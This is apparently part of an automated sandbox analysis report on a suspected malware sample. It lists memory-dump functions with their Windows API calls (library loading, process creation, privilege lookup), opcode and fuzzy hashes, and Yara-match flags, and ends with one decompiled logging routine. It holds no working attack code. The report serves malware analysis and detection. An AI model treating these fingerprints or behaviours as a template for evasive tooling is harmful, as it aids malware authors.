                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                        • Instruction ID: 6dbd7fb0f981e5f03a9f2737030ce118368fce49ee376aea9878c7566710f3b7
                                        • Opcode Fuzzy Hash: 8dd989eea79af60a2177110ff857ca10202f9c8b5bfc158903865a0a4b584fe4
                                        • Instruction Fuzzy Hash: 9C011EB5E0020DABDF10EBE4DC42FADB3789B54309F144295AD08A7241F671EB588BB2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D5ACC3, Relevance: 1.5, APIs: 1, Instructions: 48libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        • LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 00D5AD42
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: Load
                                        • String ID:
                                        • API String ID: 2234796835-0
                                        • Opcode ID: 491d57289d6b76dbf47689211f22874d938db2dca6aec03b9b621a641ab3e1be
                                        • Instruction ID: 4386f73e23655cfb63c1a9edcbd4d54fef879538d8108544b01794030a25e55a
                                        • Opcode Fuzzy Hash: 491d57289d6b76dbf47689211f22874d938db2dca6aec03b9b621a641ab3e1be
                                        • Instruction Fuzzy Hash: 17015EB5E0014AABDF10DFA8DC41FEDB775AB54309F148299ED08A6142F631A7188BA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D6A0DE, Relevance: 1.5, APIs: 1, Instructions: 43processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00D6A134
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateInternalProcess
                                        • String ID:
                                        • API String ID: 2186235152-0
                                        • Opcode ID: 698bb61cbf346b7ca8d815428a09d33944ab96ddbf40aed6c8f6ea9c6184deac
                                        • Instruction ID: 502445cfac91eb7692658006a262a10fd6c8bbb76fb81c4cf89d21e7676d227d
                                        • Opcode Fuzzy Hash: 698bb61cbf346b7ca8d815428a09d33944ab96ddbf40aed6c8f6ea9c6184deac
                                        • Instruction Fuzzy Hash: 0601AFB2210108AFCB54DF89DC80EEB77ADAF8C754F158258FA5DA7241D630E851CBA1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D6A0E0, Relevance: 1.5, APIs: 1, Instructions: 42processCOMMON
                                        Download Yara Rule
                                        APIs
                                        • CreateProcessInternalW.KERNELBASE(?,00000000,?,?,00000000,00000000,?,?,?,00000000,00000000,?,?,00000000,?,00000000), ref: 00D6A134
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: CreateInternalProcess
                                        • String ID:
                                        • API String ID: 2186235152-0
                                        • Opcode ID: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                        • Instruction ID: 51da907d85a1689751eae6823c8d7287475cc636231202b9193381a89585f98c
                                        • Opcode Fuzzy Hash: 91c10d5b09b6f5ff7ee6d1e22534128eefdcfa4a5b7191d55d386dbf4554461c
                                        • Instruction Fuzzy Hash: 8F01AFB2210108ABCB54DF89DC80EEB77ADAF8C754F158258FA4DA7241C630E851CBA4
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D6A241, Relevance: 1.5, APIs: 1, Instructions: 33COMMON
                                        Download Yara Rule
                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,00D5F1A2,00D5F1A2,?,00000000,?,?), ref: 00D6A200
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: b152db1fdee560bd763f6c2686c6aa9dfbe3230d69f135045f1da479af764b67
                                        • Instruction ID: 27d04f2dd04394a38c82c928f77f447a6cdfd6f77b5a480c26d94bac351fad3e
                                        • Opcode Fuzzy Hash: b152db1fdee560bd763f6c2686c6aa9dfbe3230d69f135045f1da479af764b67
                                        • Instruction Fuzzy Hash: DDF0EC362102146BD710EB98DC45DE7B7E9DFC4320B14C54AF99C57302C531E9058BE0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D6A1C1, Relevance: 1.5, APIs: 1, Instructions: 29COMMON
                                        Download Yara Rule
                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,00D5F1A2,00D5F1A2,?,00000000,?,?), ref: 00D6A200
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: ee74257f2377764a350c8b97fa778e0872fd84b3618d21fd4a2e2923eed34e93
                                        • Instruction ID: b4f819b796c3c51ebb962bb5164af1f3b7a99209bf768d0fb2fba062e9f1fec2
                                        • Opcode Fuzzy Hash: ee74257f2377764a350c8b97fa778e0872fd84b3618d21fd4a2e2923eed34e93
                                        • Instruction Fuzzy Hash: 64F0A0B16102046FDB10DF64CC89EE77BA8EF45310F008566F98897201D630A411CBB1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D6A030, Relevance: 1.5, APIs: 1, Instructions: 24memoryCOMMON
                                        Download Yara Rule
                                        APIs
                                        • RtlAllocateHeap.NTDLL(00D64506,?,00D64C7F,00D64C7F,?,00D64506,?,?,?,?,?,00000000,00000000,?), ref: 00D6A05D
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: AllocateHeap
                                        • String ID:
                                        • API String ID: 1279760036-0
                                        • Opcode ID: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                        • Instruction ID: 4d5899a6a9b266f1fc7280de19c28a78104832997a72ad9b6d55af4f3f7b59ee
                                        • Opcode Fuzzy Hash: ecb7fbf7fbf697e7ed6b19bb654fc0845e00bd12648aab82589a03cf581b1705
                                        • Instruction Fuzzy Hash: 15E046B1200208ABDB14EF99CC81EA777ACEF88750F118559FE486B242C630F910CBF0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D6A1D0, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                        Download Yara Rule
                                        APIs
                                        • LookupPrivilegeValueW.ADVAPI32(00000000,?,00D5F1A2,00D5F1A2,?,00000000,?,?), ref: 00D6A200
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: LookupPrivilegeValue
                                        • String ID:
                                        • API String ID: 3899507212-0
                                        • Opcode ID: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                        • Instruction ID: 15b0cd9bbb7d8d7eb6305437327a2569690fa0827600ab60669e71fa77df9686
                                        • Opcode Fuzzy Hash: c524c4dcdeb286be68a002add1a356f71d86b8c938967e6280f3f61150ebef6a
                                        • Instruction Fuzzy Hash: 3CE01AB12002086BDB10DF49CC85EE737ADEF88750F118155FA4867241C930E8108BF5
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D5F697, Relevance: 1.5, APIs: 1, Instructions: 24COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNELBASE(00008003,?,00D58CF4,?), ref: 00D5F6CB
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: c47c1e8a53ab1586d6a385345e338d9cfe916352efd7ef1e102023afcef54b19
                                        • Instruction ID: 31d8ba454c34130bdc543924c6f54650e1a357d99b3ae4f78105c3795315da66
                                        • Opcode Fuzzy Hash: c47c1e8a53ab1586d6a385345e338d9cfe916352efd7ef1e102023afcef54b19
                                        • Instruction Fuzzy Hash: 73E0DF727802016EEF10FF64CD43F6AB381AB06340F0904B8FD949F6C7E620E0228666
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 00D5F6A0, Relevance: 1.5, APIs: 1, Instructions: 19COMMON
                                        Download Yara Rule
                                        APIs
                                        • SetErrorMode.KERNELBASE(00008003,?,00D58CF4,?), ref: 00D5F6CB
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914195239.0000000000D50000.00000040.00000001.sdmp, Offset: 00D50000, based on PE: false
                                        Yara matches
                                        Similarity
                                        • API ID: ErrorMode
                                        • String ID:
                                        • API String ID: 2340568224-0
                                        • Opcode ID: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                        • Instruction ID: e976baf6f63ec388c6a9187b983a9c6c99052c9f2a667820f81c8af774792e86
                                        • Opcode Fuzzy Hash: cec8ba978ca00a4152f16fa99d3564a32c161d26ed3cfe0d05bc2e8c73902fa4
                                        • Instruction Fuzzy Hash: 22D052626A03083BEA10FAA89C03F26328AAB45B01F490064FA88AA2C3E960E4008175
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 038A967A, Relevance: 1.5, APIs: 1, Instructions: 8libraryCOMMON
                                        Download Yara Rule
                                        APIs
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: InitializeThunk
                                        • String ID:
                                        • API String ID: 2994545307-0
                                        • Opcode ID: a1416a8be69c8ebd927cd5773dfd3c53d840b7eac7328e8fadcb21a79a8e5cd6
                                        • Instruction ID: becbc2d99735c6a5e340f4b3b43b90b3dc0c613ba4a2303fe36e727386adf0cd
                                        • Opcode Fuzzy Hash: a1416a8be69c8ebd927cd5773dfd3c53d840b7eac7328e8fadcb21a79a8e5cd6
                                        • Instruction Fuzzy Hash: 80B02B718014C9C6E600D7E006087173900BBC0300F17C0E1D2024350A4338C084F1B1
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Non-executed Functions

                                        Function 038FFDDA, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 42COMMON
                                        Download Yara Rule
                                        C-Code - Quality: 53%
                                        			E038FFDDA(intOrPtr* __edx, intOrPtr _a4) {
				void* _t7;
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr* _t12;
				intOrPtr* _t13;
				intOrPtr _t14;
				intOrPtr* _t15;

				_t13 = __edx;
				_push(_a4);
				_t14 =  *[fs:0x18];
				_t15 = _t12;
				_t7 = E038ACE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
				_push(_t13);
				E038F5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
				_t9 =  *_t15;
				if(_t9 == 0xffffffff) {
					_t10 = 0;
				} else {
					_t10 =  *((intOrPtr*)(_t9 + 0x14));
				}
				_push(_t10);
				_push(_t15);
				_push( *((intOrPtr*)(_t15 + 0xc)));
				_push( *((intOrPtr*)(_t14 + 0x24)));
				return E038F5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
			}










                                        0x038ffdda
                                        0x038ffde2
                                        0x038ffde5
                                        0x038ffdec
                                        0x038ffdfa
                                        0x038ffdff
                                        0x038ffe0a
                                        0x038ffe0f
                                        0x038ffe17
                                        0x038ffe1e
                                        0x038ffe19
                                        0x038ffe19
                                        0x038ffe19
                                        0x038ffe20
                                        0x038ffe21
                                        0x038ffe22
                                        0x038ffe25
                                        0x038ffe40

                                        APIs
                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 038FFDFA
                                        Strings
                                        • RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 038FFE01
                                        • RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 038FFE2B
                                        Memory Dump Source
                                        • Source File: 00000004.00000002.914936849.0000000003840000.00000040.00000001.sdmp, Offset: 03840000, based on PE: true
                                        • Associated: 00000004.00000002.915122654.000000000395B000.00000040.00000001.sdmp Download File
                                        • Associated: 00000004.00000002.915130424.000000000395F000.00000040.00000001.sdmp Download File
                                        Similarity
                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                                        • String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
                                        • API String ID: 885266447-3903918235
                                        • Opcode ID: a359b999f3b12211a8a51fe6289f544b03c11b80dd2ab3b02149676d364a5d6a
                                        • Instruction ID: 4379a321ca7213496294ca151421d8d96703138ca150341cf3a876642ff777f9
                                        • Opcode Fuzzy Hash: a359b999f3b12211a8a51fe6289f544b03c11b80dd2ab3b02149676d364a5d6a
                                        • Instruction Fuzzy Hash: B3F0FC36540601BFDA205AC9DC01F27BF5ADB45730F140354F724D91D1D962F83086F1
                                        Uniqueness

                                        Uniqueness Score: -1.00%